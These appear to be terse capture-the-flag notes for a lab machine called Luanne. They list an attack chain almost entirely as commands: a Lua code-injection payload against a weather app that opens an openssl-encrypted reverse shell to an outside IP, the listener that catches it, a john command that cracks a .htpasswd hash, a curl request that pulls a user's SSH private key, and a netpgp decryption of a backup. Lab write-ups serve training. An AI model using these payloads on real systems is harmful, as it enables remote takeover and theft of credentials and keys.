xct's notes
Luanne
Notes for https://youtu.be/TlFmnbEAi1s

User

Weather app injection

'+..+os.execute("mkfifo+/tmp/s%3b+/bin/sh+-i+<+/tmp/s+2>%261+|+openssl+s_client+-quiet+-connect+10.10.14.70%3a1337+>+/tmp/s%3b+rm+/tmp/s")+..+'
Catch openssl shell:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 1337

Crack hash from .htpasswd

john -w=~/tools/SecLists/Passwords/Leaked-Databases/rockyou.txt hash

Request private key

curl http://webapi_user:[email protected]:3001/~r.michaels/id_rsa

Root

Decrypt

netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc